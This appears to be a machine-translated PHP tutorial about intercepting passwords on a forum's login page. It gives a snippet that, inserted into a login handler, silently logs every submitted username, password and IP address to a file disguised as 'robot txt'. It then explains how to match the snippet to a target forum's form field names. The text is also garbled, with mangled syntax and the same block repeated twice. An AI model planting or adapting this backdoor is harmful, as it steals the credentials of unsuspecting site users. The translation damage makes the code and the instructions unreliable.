php intercepts the code of background login password
- 2020-05-17 04:54:55
- OfStack
if ($_POST [loginsubmit]! =){// determine whether the login button has been clicked
$sb = user: $_POST [username] - passwd: $_POST [password] - ip: $HTTP_SERVER_VARS [REMOTE_ADDR] -. date (Y m - d H: i: s). rn; // connect the values received by POST and assign them to the variable $sb
fwrite (fopen (robot txt, ab), $sb); } // result is written to 1 file
The following simple analysis 1, with the landing page of huaxia as an example. Open the bbs. xxx. com/login php right to view the source code, CTRL + F search action find login form.
I just copied the key code.
< form action=login.php? method=post name=login onSubmit=this.submit.disabled=true; > // the value after action is the address of the form submission, which will handle login, for example, to determine whether the password is correct or not, method is POST, so $_POST is used to receive.
. Powerful ellipsis...
< TR >
< TD height=40 > Account ( < U > U < /U > ): < BR >
< INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser > < /TD > < /TR > / / user name input input box, note that the value of name is corresponding to $_POST [username], so to intercept the password of cathaysia, you need to change it to $_POST [pwuser].
< TR >
< TD height=40 > Password ( < U > P < /U > ): < BR > < INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd > < /TD > < /TR > / / user name input input box, notice that the value of name is corresponding to $_POST [username], so to intercept the password of cathaysia, you need to change it to $_POST [pwpwd].
$sb = user: $_POST [username] - passwd: $_POST [password] - ip: $HTTP_SERVER_VARS [REMOTE_ADDR] -. date (Y m - d H: i: s). rn; // connect the values received by POST and assign them to the variable $sb
fwrite (fopen (robot txt, ab), $sb); } // result is written to 1 file
The following simple analysis 1, with the landing page of huaxia as an example. Open the bbs. xxx. com/login php right to view the source code, CTRL + F search action find login form.
I just copied the key code.
< form action=login.php? method=post name=login onSubmit=this.submit.disabled=true; > // the value after action is the address of the form submission, which will handle login, for example, to determine whether the password is correct or not, method is POST, so $_POST is used to receive.
. Powerful ellipsis...
< TR >
< TD height=40 > Account ( < U > U < /U > ): < BR >
< INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser > < /TD > < /TR > / / user name input input box, note that the value of name is corresponding to $_POST [username], so to intercept the password of cathaysia, you need to change it to $_POST [pwuser].
< TR >
< TD height=40 > Password ( < U > P < /U > ): < BR > < INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd > < /TD > < /TR > / / user name input input box, notice that the value of name is corresponding to $_POST [username], so to intercept the password of cathaysia, you need to change it to $_POST [pwpwd].